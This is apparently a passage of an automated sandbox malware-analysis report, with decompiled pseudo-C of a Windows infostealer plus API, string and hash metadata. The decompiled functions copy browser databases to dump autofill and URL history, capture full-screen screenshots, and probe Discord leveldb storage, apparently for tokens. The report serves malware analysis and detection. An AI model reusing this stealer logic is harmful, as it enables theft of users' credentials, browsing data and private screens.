                                                                                								E0041ECF0( &_v276, _t181, 0x104);
                                                                                								__eflags = _t153 - _t181;
                                                                                								if(_t153 != _t181) {
                                                                                									 *((char*)(_t184 + _t153 - _t181 - 0x110)) = 0;
                                                                                									__eflags = _v276 - 0x2f;
                                                                                									if(_v276 == 0x2f) {
                                                                                										L54:
                                                                                										wsprintfA( &_v540, "%s%s",  &_v276, _t153);
                                                                                										_push( &_v276);
                                                                                										_push(0);
                                                                                										E00407659(_t181);
                                                                                										L47:
                                                                                										__eflags = 0;
                                                                                										_t130 = CreateFileA( &_v540, 0x40000000, 0, 0, 2, _v580, 0);
                                                                                										L48:
                                                                                										_v852 = _t130;
                                                                                										__eflags = _t130 - 0xffffffff;
                                                                                										if(_t130 != 0xffffffff) {
                                                                                											_t156 =  *_t179;
                                                                                											E00406B76( *_t179,  *((intOrPtr*)(_t179 + 0x138)));
                                                                                											__eflags =  *(_t179 + 0x13c);
                                                                                											_t181 = 0x4000;
                                                                                											if(__eflags == 0) {
                                                                                												 *(_t179 + 0x13c) = E0041D474(_t156, _t178, _t179, 0x4000, __eflags, 0x4000);
                                                                                											}
                                                                                											_t71 =  &_v856;
                                                                                											 *_t71 = _v856 & 0x00000000;
                                                                                											__eflags =  *_t71;
                                                                                											while(1) {
                                                                                												_t153 = E00406CCB( *_t179, _t181,  *(_t179 + 0x13c),  &_v845);
                                                                                												__eflags = _t153 - 0xffffff96;
                                                                                												if(_t153 == 0xffffff96) {
                                                                                													break;
                                                                                												}
                                                                                												__eflags = _t153;
                                                                                												if(__eflags < 0) {
                                                                                													L64:
                                                                                													_v856 = 0x5000000;
                                                                                													L65:
                                                                                													E00406EF9(_t179);
                                                                                													__eflags = _v856;
                                                                                													if(_v856 == 0) {
                                                                                														SetFileTime(_v852,  &_v568,  &_v576,  &_v560);
                                                                                													}
                                                                                													__eflags = _a16 - 1;
                                                                                													if(_a16 != 1) {
                                                                                														CloseHandle(_v852);
                                                                                													}
                                                                                													_t102 = _v856;
                                                                                													goto L70;
                                                                                												}
                                                                                												if(__eflags <= 0) {
                                                                                													L62:
                                                                                													__eflags = _v845;
                                                                                													if(_v845 != 0) {
                                                                                														goto L65;
                                                                                													}
                                                                                													__eflags = _t153;
                                                                                													if(_t153 != 0) {
                                                                                														continue;
                                                                                													}
                                                                                													goto L64;
                                                                                												}
                                                                                												_t142 = WriteFile(_v852,  *(_t179 + 0x13c), _t153,  &_v860, 0);
                                                                                												__eflags = _t142;
                                                                                												if(_t142 == 0) {
                                                                                													_v856 = 0x400;
                                                                                													goto L65;
                                                                                												}
                                                                                												goto L62;
                                                                                											}
                                                                                											_v856 = 0x1000;
                                                                                											goto L65;
                                                                                										}
                                                                                										_t102 = 0x200;
                                                                                										goto L70;
                                                                                									}
                                                                                									__eflags = _v276 - 0x5c;
                                                                                									if(_v276 == 0x5c) {
                                                                                										goto L54;
                                                                                									}
                                                                                									__eflags = _v276;
                                                                                									if(_v276 == 0) {
                                                                                										L46:
                                                                                										_t181 = _t179 + 0x140;
                                                                                										wsprintfA( &_v540, "%s%s%s", _t181,  &_v276, _t153);
                                                                                										_push( &_v276);
                                                                                										_push(_t181);
                                                                                										E00407659(_t181);
                                                                                										goto L47;
                                                                                									}
                                                                                									__eflags = _v275 - 0x3a;
                                                                                									if(_v275 != 0x3a) {
                                                                                										goto L46;
                                                                                									}
                                                                                									goto L54;
                                                                                								}
                                                                                								_v276 = 0;
                                                                                								goto L46;
                                                                                							}
                                                                                							_t130 = _v852;
                                                                                							goto L48;
                                                                                						}
                                                                                						__eflags = _a16 - 1;
                                                                                						if(_a16 == 1) {
                                                                                							goto L16;
                                                                                						}
                                                                                						_t175 = _v852;
                                                                                						_t149 =  *_t175;
                                                                                						__eflags = _t149 - 0x2f;
                                                                                						if(_t149 == 0x2f) {
                                                                                							L33:
                                                                                							_push(_t175);
                                                                                							_push(0);
                                                                                							L35:
                                                                                							E00407659(_t181);
                                                                                							goto L16;
                                                                                						}
                                                                                						__eflags = _t149 - 0x5c;
                                                                                						if(_t149 == 0x5c) {
                                                                                							goto L33;
                                                                                						}
                                                                                						__eflags = _t149;
                                                                                						if(_t149 == 0) {
                                                                                							L34:
                                                                                							_push(_t175);
                                                                                							_t179 = _t179 + 0x140;
                                                                                							__eflags = _t179;
                                                                                							_push(_t179);
                                                                                							goto L35;
                                                                                						}
                                                                                						__eflags =  *((char*)(_t175 + 1)) - 0x3a;
                                                                                						if( *((char*)(_t175 + 1)) != 0x3a) {
                                                                                							goto L34;
                                                                                						}
                                                                                						goto L33;
                                                                                					}
                                                                                				} else {
                                                                                					goto L3;
                                                                                				}
                                                                                			}





































                                                                                0x00407842
                                                                                0x0040784a
                                                                                0x00407853
                                                                                0x00407859
                                                                                0x0040785c
                                                                                0x00000000
                                                                                0x00407831
                                                                                0x00407831
                                                                                0x00407833
                                                                                0x00407838
                                                                                0x0040783d
                                                                                0x0040783d
                                                                                0x00000000
                                                                                0x00407831
                                                                                0x0040782f
                                                                                0x004077e0
                                                                                0x004078be
                                                                                0x004078c2
                                                                                0x004078c6
                                                                                0x004078c6
                                                                                0x004078cb
                                                                                0x004078cd
                                                                                0x004078d0
                                                                                0x004078d4
                                                                                0x004078d7
                                                                                0x00000000
                                                                                0x004078dd
                                                                                0x004078dd
                                                                                0x004078e0
                                                                                0x004078e2
                                                                                0x004078e2
                                                                                0x004078f0
                                                                                0x004078f0
                                                                                0x004078f2
                                                                                0x004078f5
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x004078e9
                                                                                0x004078eb
                                                                                0x004078eb
                                                                                0x004078f8
                                                                                0x004078fe
                                                                                0x00407906
                                                                                0x00407911
                                                                                0x00407914
                                                                                0x00407916
                                                                                0x00407955
                                                                                0x00407959
                                                                                0x00407960
                                                                                0x0040796d
                                                                                0x00407973
                                                                                0x00407977
                                                                                0x00407989
                                                                                0x00407989
                                                                                0x0040798b
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040797b
                                                                                0x0040797d
                                                                                0x00407983
                                                                                0x00407983
                                                                                0x00407986
                                                                                0x00407986
                                                                                0x00407986
                                                                                0x00407987
                                                                                0x00000000
                                                                                0x00407987
                                                                                0x0040797f
                                                                                0x00407981
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00407981
                                                                                0x0040799a
                                                                                0x004079a2
                                                                                0x004079a4
                                                                                0x00407a18
                                                                                0x00407a20
                                                                                0x00407a27
                                                                                0x00407a4c
                                                                                0x00407a60
                                                                                0x00407a6c
                                                                                0x00407a6d
                                                                                0x00407a6f
                                                                                0x004079e0
                                                                                0x004079e0
                                                                                0x004079f9
                                                                                0x004079ff
                                                                                0x004079ff
                                                                                0x00407a05
                                                                                0x00407a08
                                                                                0x00407a82
                                                                                0x00407a84
                                                                                0x00407a89
                                                                                0x00407a91
                                                                                0x00407a96
                                                                                0x00407a9f
                                                                                0x00407a9f
                                                                                0x00407aa5
                                                                                0x00407aa5
                                                                                0x00407aa5
                                                                                0x00407aac
                                                                                0x00407ac2
                                                                                0x00407ac6
                                                                                0x00407ac9
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00407acf
                                                                                0x00407ad1
                                                                                0x00407b02
                                                                                0x00407b02
                                                                                0x00407b0c
                                                                                0x00407b0e
                                                                                0x00407b13
                                                                                0x00407b1a
                                                                                0x00407b37
                                                                                0x00407b37
                                                                                0x00407b3d
                                                                                0x00407b41
                                                                                0x00407b49
                                                                                0x00407b49
                                                                                0x00407b4f
                                                                                0x00000000
                                                                                0x00407b4f
                                                                                0x00407ad3
                                                                                0x00407af5
                                                                                0x00407af5
                                                                                0x00407afc
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00407afe
                                                                                0x00407b00
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00407b00
                                                                                0x00407aeb
                                                                                0x00407af1
                                                                                0x00407af3
                                                                                0x00407b72
                                                                                0x00000000
                                                                                0x00407b72
                                                                                0x00000000
                                                                                0x00407af3
                                                                                0x00407b66
                                                                                0x00000000
                                                                                0x00407b66
                                                                                0x00407a0a
                                                                                0x00000000
                                                                                0x00407a0a
                                                                                0x00407a29
                                                                                0x00407a30
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00407a32
                                                                                0x00407a39
                                                                                0x004079ad
                                                                                0x004079b5
                                                                                0x004079c8
                                                                                0x004079d7
                                                                                0x004079d8
                                                                                0x004079d9
                                                                                0x00000000
                                                                                0x004079df
                                                                                0x00407a3f
                                                                                0x00407a46
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00407a46
                                                                                0x004079a6
                                                                                0x00000000
                                                                                0x004079a6
                                                                                0x00407962
                                                                                0x00000000
                                                                                0x00407962
                                                                                0x00407918
                                                                                0x0040791c
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00407922
                                                                                0x00407928
                                                                                0x0040792a
                                                                                0x0040792c
                                                                                0x0040793c
                                                                                0x0040793c
                                                                                0x0040793d
                                                                                0x00407949
                                                                                0x00407949
                                                                                0x00000000
                                                                                0x0040794f
                                                                                0x0040792e
                                                                                0x00407930
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00407932
                                                                                0x00407934
                                                                                0x00407941
                                                                                0x00407941
                                                                                0x00407942
                                                                                0x00407942
                                                                                0x00407948
                                                                                0x00000000
                                                                                0x00407948
                                                                                0x00407936
                                                                                0x0040793a
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040793a
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000

                                                                                APIs
                                                                                • SetFileTime.KERNEL32(?,?,?,?), ref: 00407B37
                                                                                • CloseHandle.KERNEL32(?), ref: 00407B49
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.508134616.0000000000401000.00000020.00000800.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000011.00000002.508071026.0000000000400000.00000004.00000800.00020000.00000000.sdmp
                                                                                • Associated: 00000011.00000002.508553969.0000000000438000.00000002.00000800.00020000.00000000.sdmp
                                                                                • Associated: 00000011.00000002.508645863.0000000000447000.00000004.00000800.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_file_22613.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CloseFileHandleTime
                                                                                • String ID: %s%s$%s%s%s$:$\
                                                                                • API String ID: 2100898393-1100577047
                                                                                • Opcode ID: aa539f52d09809f5e520ba1ca1a4bc351e0559bc9420136e165d0b5d0603cb49
                                                                                • Instruction ID: bae9a44b4bbb3d78642945d3c842c007b3f1b3f990181fddbe23d32488162066
                                                                                • Opcode Fuzzy Hash: aa539f52d09809f5e520ba1ca1a4bc351e0559bc9420136e165d0b5d0603cb49
                                                                                • Instruction Fuzzy Hash: 78B1C331D086189FDF259B28CC897EA7778AB05314F0401BBE419B72D1D778BE85CB9A
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 24%
                                                                                			E00410396(CHAR* __ecx, void* __edx) {
                                                                                				void* __ebx;
                                                                                				void* __edi;
                                                                                				void* __esi;
                                                                                				void* __ebp;
                                                                                				signed int _t24;
                                                                                				void* _t39;
                                                                                				int _t41;
                                                                                				void* _t44;
                                                                                				void* _t49;
                                                                                				void* _t50;
                                                                                				void* _t55;
                                                                                				void* _t57;
                                                                                				void* _t68;
                                                                                				CHAR* _t69;
                                                                                				void* _t71;
                                                                                				void* _t72;
                                                                                				intOrPtr _t74;
                                                                                				void* _t75;
                                                                                				void* _t76;
                                                                                				signed int _t77;
                                                                                				void* _t79;
                                                                                				void* _t81;
                                                                                				void* _t83;
                                                                                
                                                                                				_t67 = __edx;
                                                                                				_t77 = _t79 - 0x198;
                                                                                				_t24 =  *0x447674; // 0x4124c941
                                                                                				 *(_t77 + 0x194) = _t24 ^ _t77;
                                                                                				 *((intOrPtr*)(_t77 - 0x80)) =  *((intOrPtr*)(_t77 + 0x1a0));
                                                                                				_t69 = __ecx;
                                                                                				_t56 = __edx;
                                                                                				GetCurrentDirectoryA(0x104, _t77 + 0x90);
                                                                                				 *0x44a1b8(_t77 + 0x90, "\\temp", _t68, _t72, _t55);
                                                                                				CopyFileA(_t69, _t77 + 0x90, 1);
                                                                                				E00427E30(_t77 - 0x74, 0, 0x104);
                                                                                				wsprintfA(_t77 - 0x74, "Autofill\\%s_%s.txt",  *((intOrPtr*)(_t77 - 0x80)), _t56);
                                                                                				_t74 =  *0x449fa4; // 0x146f710
                                                                                				_t39 =  *0x44a0a4(_t77 + 0x90, _t77 - 0x7c);
                                                                                				_t81 = _t79 - 0x218 + 0x24;
                                                                                				if(_t39 == 0) {
                                                                                					_t44 =  *0x44a058( *((intOrPtr*)(_t77 - 0x7c)), _t74, 0xffffffff, _t77 - 0x78, 0);
                                                                                					_t83 = _t81 + 0x14;
                                                                                					if(_t44 == 0) {
                                                                                						_t76 = E00420300(_t77 - 0x74, "w");
                                                                                						if(_t76 != 0) {
                                                                                							_t49 =  *0x44a074( *((intOrPtr*)(_t77 - 0x78)));
                                                                                							while(1) {
                                                                                								_t87 = _t49 - 0x64;
                                                                                								if(_t49 != 0x64) {
                                                                                									break;
                                                                                								}
                                                                                								_t50 =  *0x44a094( *((intOrPtr*)(_t77 - 0x78)), 0);
                                                                                								_t56 = _t50;
                                                                                								E0041E879(_t50, 0, _t76, __eflags);
                                                                                								E0041E879(_t50, 0, _t76, __eflags);
                                                                                								_t49 =  *0x44a074( *((intOrPtr*)(_t77 - 0x78)), _t76, "\n", _t76, "%s\t%s", _t50,  *0x44a094( *((intOrPtr*)(_t77 - 0x78)), 1));
                                                                                								_t83 = _t83 + 0x2c;
                                                                                							}
                                                                                							_push(_t76);
                                                                                							E0041EAA2(_t56, 0, _t76, _t87);
                                                                                						}
                                                                                					}
                                                                                					 *0x44a078( *((intOrPtr*)(_t77 - 0x78)));
                                                                                					 *0x44a0a8( *((intOrPtr*)(_t77 - 0x7c)));
                                                                                				}
                                                                                				_t41 = DeleteFileA(_t77 + 0x90);
                                                                                				_pop(_t71);
                                                                                				_pop(_t75);
                                                                                				_pop(_t57);
                                                                                				return E0041DEB4(_t41, _t57,  *(_t77 + 0x194) ^ _t77, _t67, _t71, _t75);
                                                                                 			}

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.508134616.0000000000401000.00000020.00000800.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 00000011.00000002.508071026.0000000000400000.00000004.00000800.00020000.00000000.sdmp
                                                                                 • Associated: 00000011.00000002.508553969.0000000000438000.00000002.00000800.00020000.00000000.sdmp
                                                                                 • Associated: 00000011.00000002.508645863.0000000000447000.00000004.00000800.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_file_22613.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: File_fprintf$CopyCurrentDeleteDirectory__fsopen_memsetlstrcatwsprintf
                                                                                • String ID: %s%s$Autofill\%s_%s.txt$\temp
                                                                                • API String ID: 3845412190-2986410175
                                                                                • Opcode ID: afb33ac798dc529709ba16af11e33561febff521979628848d7b6ff8e3f824ac
                                                                                • Instruction ID: bdc1ab48cfcf09882a5d0912b9779bd571f494cf2b0314aa1fdabfb6de3e3664
                                                                                • Opcode Fuzzy Hash: afb33ac798dc529709ba16af11e33561febff521979628848d7b6ff8e3f824ac
                                                                                • Instruction Fuzzy Hash: 48317576900118AFEB209FB5EC49EDE7BBCEF09314F10013AFA09E3151DB7959948B59
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 22%
                                                                                			E004104F2(void* __ebx, CHAR* __ecx, void* __edx) {
                                                                                				void* __edi;
                                                                                				void* __esi;
                                                                                				void* __ebp;
                                                                                				signed int _t24;
                                                                                				void* _t39;
                                                                                				int _t41;
                                                                                				void* _t44;
                                                                                				void* _t49;
                                                                                				void* _t64;
                                                                                				void* _t65;
                                                                                				CHAR* _t66;
                                                                                				void* _t67;
                                                                                				void* _t68;
                                                                                				void* _t69;
                                                                                				void* _t72;
                                                                                				signed int _t73;
                                                                                				void* _t75;
                                                                                				void* _t77;
                                                                                				void* _t79;
                                                                                
                                                                                				_t64 = __edx;
                                                                                				_t54 = __ebx;
                                                                                				_t73 = _t75 - 0x198;
                                                                                				_t24 =  *0x447674; // 0x4124c941
                                                                                				 *(_t73 + 0x194) = _t24 ^ _t73;
                                                                                				 *((intOrPtr*)(_t73 - 0x80)) =  *((intOrPtr*)(_t73 + 0x1a0));
                                                                                				_t66 = __ecx;
                                                                                				GetCurrentDirectoryA(0x104, _t73 + 0x90);
                                                                                				 *0x44a1b8(_t73 + 0x90, "\\temp", _t65, _t69);
                                                                                				CopyFileA(_t66, _t73 + 0x90, 1);
                                                                                				E00427E30(_t73 - 0x74, 0, 0x104);
                                                                                				wsprintfA(_t73 - 0x74, "History\\%s_%s.txt",  *((intOrPtr*)(_t73 - 0x80)), __ebx);
                                                                                				_t39 =  *0x44a0a4(_t73 + 0x90, _t73 - 0x7c);
                                                                                				_t77 = _t75 - 0x218 + 0x24;
                                                                                				if(_t39 == 0) {
                                                                                					_t44 =  *0x44a058( *((intOrPtr*)(_t73 - 0x7c)), "SELECT url FROM urls", 0xffffffff, _t73 - 0x78, 0);
                                                                                					_t79 = _t77 + 0x14;
                                                                                					if(_t44 == 0) {
                                                                                						_t68 = E00420300(_t73 - 0x74, "w");
                                                                                						if(_t68 != 0) {
                                                                                							_t49 =  *0x44a074( *((intOrPtr*)(_t73 - 0x78)));
                                                                                							while(1) {
                                                                                								_t83 = _t49 - 0x64;
                                                                                								if(_t49 != 0x64) {
                                                                                									break;
                                                                                								}
                                                                                								 *0x44a094( *((intOrPtr*)(_t73 - 0x78)), 0);
                                                                                								E0041E879(_t54, _t68, 0, __eflags);
                                                                                								_t49 =  *0x44a074( *((intOrPtr*)(_t73 - 0x78)), _t68, "%s\n",  *0x44a094( *((intOrPtr*)(_t73 - 0x78)), 0));
                                                                                								_t79 = _t79 + 0x20;
                                                                                							}
                                                                                							_push(_t68);
                                                                                							E0041EAA2(_t54, _t68, 0, _t83);
                                                                                						}
                                                                                					}
                                                                                					 *0x44a078( *((intOrPtr*)(_t73 - 0x78)));
                                                                                					 *0x44a0a8( *((intOrPtr*)(_t73 - 0x7c)));
                                                                                				}
                                                                                				_t41 = DeleteFileA(_t73 + 0x90);
                                                                                				_pop(_t67);
                                                                                				_pop(_t72);
                                                                                				return E0041DEB4(_t41, _t54,  *(_t73 + 0x194) ^ _t73, _t64, _t67, _t72);
                                                                                 			}

                                                                                APIs
                                                                                • GetCurrentDirectoryA.KERNEL32(00000104,?,?,?), ref: 00410527
                                                                                • lstrcat.KERNEL32(?,\temp), ref: 00410539
                                                                                • CopyFileA.KERNEL32 ref: 00410549
                                                                                • _memset.LIBCMT ref: 00410557
                                                                                • wsprintfA.USER32 ref: 00410569
                                                                                • DeleteFileA.KERNEL32(?), ref: 0041061C
                                                                                  • Part of subcall function 00420300: __fsopen.LIBCMT ref: 0042030D
                                                                                • _fprintf.LIBCMT ref: 004105E4
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.508134616.0000000000401000.00000020.00000800.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 00000011.00000002.508071026.0000000000400000.00000004.00000800.00020000.00000000.sdmp
                                                                                 • Associated: 00000011.00000002.508553969.0000000000438000.00000002.00000800.00020000.00000000.sdmp
                                                                                 • Associated: 00000011.00000002.508645863.0000000000447000.00000004.00000800.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_file_22613.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: File$CopyCurrentDeleteDirectory__fsopen_fprintf_memsetlstrcatwsprintf
                                                                                • String ID: %s$History\%s_%s.txt$SELECT url FROM urls$\temp
                                                                                • API String ID: 2003248957-2199967400
                                                                                • Opcode ID: 74ab27de941d808c8b04fbdcd61beefebd078a6fa58d223668c448af2c25d352
                                                                                • Instruction ID: f207117376f4ccc7e290a4b0540f9da8f9dd811e54241f0de67bd91d847a61c1
                                                                                • Opcode Fuzzy Hash: 74ab27de941d808c8b04fbdcd61beefebd078a6fa58d223668c448af2c25d352
                                                                                • Instruction Fuzzy Hash: 21318176940118AFEB209FB5EC48EEE7B7CEF05314F10002AF609D2061DB7995A48F59
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 61%
                                                                                			E00417C86(int __ebx, int __ecx) {
                                                                                				signed int _v8;
                                                                                				char _v24;
                                                                                				struct HWND__* _v28;
                                                                                				void* _v32;
                                                                                				void* __edi;
                                                                                				void* __esi;
                                                                                				signed int _t18;
                                                                                				void* _t22;
                                                                                				int _t25;
                                                                                				char* _t28;
                                                                                				struct HDC__** _t34;
                                                                                				void* _t42;
                                                                                				int _t43;
                                                                                				int _t44;
                                                                                				signed int _t46;
                                                                                
                                                                                				_t36 = __ebx;
                                                                                				_t18 =  *0x447674; // 0x4124c941
                                                                                				_v8 = _t18 ^ _t46;
                                                                                				_t43 = __ecx;
                                                                                				_v28 = CreateCompatibleDC(0);
                                                                                				_t22 = CreateCompatibleBitmap(GetDC(0), __ecx, __ebx);
                                                                                				_v32 = _t22;
                                                                                				SelectObject(_v28, _t22);
                                                                                				_t25 = BitBlt(_v28, 0, 0, _t43, __ebx, GetDC(0), 0, 0, 0xcc0020);
                                                                                				__imp__GdipAlloc(0x10);
                                                                                				_t44 = _t25;
                                                                                				if(_t44 == 0) {
                                                                                					_t44 = 0;
                                                                                				} else {
                                                                                					_t34 =  &_v28;
                                                                                					 *_t44 = 0x4426e8;
                                                                                					_v28 = 0;
                                                                                					__imp__GdipCreateBitmapFromHBITMAP(_v32, 0, _t34);
                                                                                					 *((intOrPtr*)(_t44 + 8)) = _t34;
                                                                                					 *(_t44 + 4) = _v28;
                                                                                				}
                                                                                				E00417BCB(_t44,  &_v24);
                                                                                				_t28 =  &_v24;
                                                                                				__imp__GdipSaveImageToFile( *(_t44 + 4), L"screenshot.jpg", _t28, 0);
                                                                                				if(_t28 != 0) {
                                                                                					 *((intOrPtr*)(_t44 + 8)) = _t28;
                                                                                				}
                                                                                				 *((intOrPtr*)( *_t44))();
                                                                                				DeleteObject(_v32);
                                                                                				return E0041DEB4(1, _t36, _v8 ^ _t46, _t42, _t44, 0, 1);
                                                                                 			}

                                                                                APIs
                                                                                • CreateCompatibleDC.GDI32(00000000), ref: 00417C9D
                                                                                • GetDC.USER32(00000000), ref: 00417CA9
                                                                                • CreateCompatibleBitmap.GDI32(00000000), ref: 00417CB0
                                                                                • SelectObject.GDI32(?,00000000), ref: 00417CBD
                                                                                • GetDC.USER32(00000000), ref: 00417CCB
                                                                                • BitBlt.GDI32(?,00000000,00000000,00000000,00000000,00000000), ref: 00417CD9
                                                                                • GdipAlloc.GDIPLUS(00000010,?,?,?,?,?,?,00417D99), ref: 00417CE1
                                                                                • GdipCreateBitmapFromHBITMAP.GDIPLUS(?,00000000,?,?,?,?,?,?,?,00417D99), ref: 00417CFE
                                                                                • GdipSaveImageToFile.GDIPLUS(?,screenshot.jpg,?,00000000,?,?,?,?,?,?,00417D99), ref: 00417D28
                                                                                • DeleteObject.GDI32(?), ref: 00417D40
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.508134616.0000000000401000.00000020.00000800.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 00000011.00000002.508071026.0000000000400000.00000004.00000800.00020000.00000000.sdmp
                                                                                 • Associated: 00000011.00000002.508553969.0000000000438000.00000002.00000800.00020000.00000000.sdmp
                                                                                 • Associated: 00000011.00000002.508645863.0000000000447000.00000004.00000800.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_file_22613.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CreateGdip$BitmapCompatibleObject$AllocDeleteFileFromImageSaveSelect
                                                                                • String ID: screenshot.jpg
                                                                                • API String ID: 1869477856-673422685
                                                                                • Opcode ID: a5ee259313fc44183fb39da7d09b52787b0fa2599c0bdd855be26c2ce063b97e
                                                                                • Instruction ID: a51bd929b91848abdc976a8940832b39c572c9b5d1e4807e8fe892be9ceffd25
                                                                                • Opcode Fuzzy Hash: a5ee259313fc44183fb39da7d09b52787b0fa2599c0bdd855be26c2ce063b97e
                                                                                • Instruction Fuzzy Hash: 902189B590121AAFCB009FA5DC49DEFBFB8FF4A710B10402AF505D3210DB749951DBA9
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 96%
                                                                                			E00408D8A(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, void* __eflags) {
                                                                                				CHAR* _t75;
                                                                                				signed char _t76;
                                                                                				CHAR* _t82;
                                                                                				signed char _t83;
                                                                                				intOrPtr* _t91;
                                                                                				intOrPtr* _t101;
                                                                                				char* _t119;
                                                                                				char* _t124;
                                                                                				intOrPtr _t129;
                                                                                				intOrPtr _t131;
                                                                                				intOrPtr _t132;
                                                                                				void* _t137;
                                                                                				void* _t138;
                                                                                				void* _t139;
                                                                                				void* _t140;
                                                                                				void* _t141;
                                                                                				intOrPtr _t142;
                                                                                				char* _t143;
                                                                                				void* _t145;
                                                                                				intOrPtr _t146;
                                                                                				char* _t147;
                                                                                				void* _t148;
                                                                                
                                                                                				_t148 = __eflags;
                                                                                				_push(0x48);
                                                                                				E004219DE(E0043684A, __ebx, __edi, __esi);
                                                                                				_t131 = __ecx;
                                                                                				 *((intOrPtr*)(_t137 - 0x4c)) = __ecx;
                                                                                				_t129 = 0xf;
                                                                                				 *((intOrPtr*)(_t137 - 4)) = 0;
                                                                                				 *((intOrPtr*)(_t137 - 0x18)) = _t129;
                                                                                				 *((intOrPtr*)(_t137 - 0x1c)) = 0;
                                                                                				 *((char*)(_t137 - 0x2c)) = 0;
                                                                                				E00403A16(_t137 - 0x2c, _t148, "\\Local Storage\\leveldb\\CURRENT", 0x1e);
                                                                                				 *((char*)(_t137 - 4)) = 1;
                                                                                				_t75 = E0040D3FA(_t137 - 0x2c, _t137 - 0x48, _t131, _t137 - 0x2c);
                                                                                				_t139 = _t138 + 0xc;
                                                                                				if(_t75[0x14] >= 0x10) {
                                                                                					_t75 =  *_t75;
                                                                                				}
                                                                                				_t76 = GetFileAttributesA(_t75);
                                                                                				if(_t76 == 0xffffffff || (_t76 & 0x00000010) != 0) {
                                                                                					_t132 = 0;
                                                                                					__eflags = 0;
                                                                                				} else {
                                                                                					_t132 = 1;
                                                                                				}
                                                                                				E00402C34(_t137 - 0x48, 1, 0);
                                                                                				 *((char*)(_t137 - 4)) = 0;
                                                                                				E00402C34(_t137 - 0x2c, 1, 0);
                                                                                				_t152 = _t132;
                                                                                				if(_t132 != 0) {
                                                                                					 *((intOrPtr*)(_t137 - 0x18)) = _t129;
                                                                                					 *((intOrPtr*)(_t137 - 0x1c)) = 0;
                                                                                					 *((char*)(_t137 - 0x2c)) = 0;
                                                                                					E00403A16(_t137 - 0x2c, _t152, "\\Local Storage\\leveldb", 0x16);
                                                                                					 *((char*)(_t137 - 4)) = 2;
                                                                                					_t101 = E0040D3FA(_t137 - 0x2c, _t137 - 0x48,  *((intOrPtr*)(_t137 - 0x4c)), _t137 - 0x2c);
                                                                                					_t145 = _t139 + 0xc;
                                                                                					 *((char*)(_t137 - 4)) = 3;
                                                                                					_t153 =  *((intOrPtr*)(_t101 + 0x14)) - 0x10;
                                                                                					if( *((intOrPtr*)(_t101 + 0x14)) >= 0x10) {
                                                                                						_t101 =  *_t101;
                                                                                					}
                                                                                					_push(_t101);
                                                                                					_t146 = _t145 - 0x1c;
                                                                                					 *((intOrPtr*)(_t137 - 0x54)) = _t146;
                                                                                					E0040410F(_t146, _t137 + 8);
                                                                                					_t147 = _t146 - 0x1c;
                                                                                					 *((char*)(_t137 - 4)) = 4;
                                                                                					_t124 = _t147;
                                                                                					 *((intOrPtr*)(_t137 - 0x50)) = _t147;
                                                                                					 *((intOrPtr*)(_t124 + 0x14)) = _t129;
                                                                                					 *((intOrPtr*)(_t124 + 0x10)) = 0;
                                                                                					 *_t124 = 0;
                                                                                					E0040381A(_t124, "Discord");
                                                                                					 *((char*)(_t137 - 4)) = 3;
                                                                                					E00408B6B(0, "Local Storage", _t129, _t146, _t153);
                                                                                					_t139 = _t147 + 0x3c;
                                                                                					E00402C34(_t137 - 0x48, 1, 0);
                                                                                					 *((char*)(_t137 - 4)) = 0;
                                                                                					E00402C34(_t137 - 0x2c, 1, 0);
                                                                                				}
                                                                                				 *((intOrPtr*)(_t137 - 0x18)) = _t129;
                                                                                				 *((intOrPtr*)(_t137 - 0x1c)) = 0;
                                                                                				 *((char*)(_t137 - 0x2c)) = 0;
                                                                                				E00403A16(_t137 - 0x2c, _t153, "\\Session Storage\\CURRENT", 0x18);
                                                                                				 *((char*)(_t137 - 4)) = 5;
                                                                                				_t82 = E0040D3FA(_t137 - 0x2c, _t137 - 0x48,  *((intOrPtr*)(_t137 - 0x4c)), _t137 - 0x2c);
                                                                                				_t140 = _t139 + 0xc;
                                                                                				if(_t82[0x14] >= 0x10) {
                                                                                					_t82 =  *_t82;
                                                                                				}
                                                                                				_t83 = GetFileAttributesA(_t82);
                                                                                				if(_t83 == 0xffffffff || (_t83 & 0x00000010) != 0) {
                                                                                					_t133 = 0;
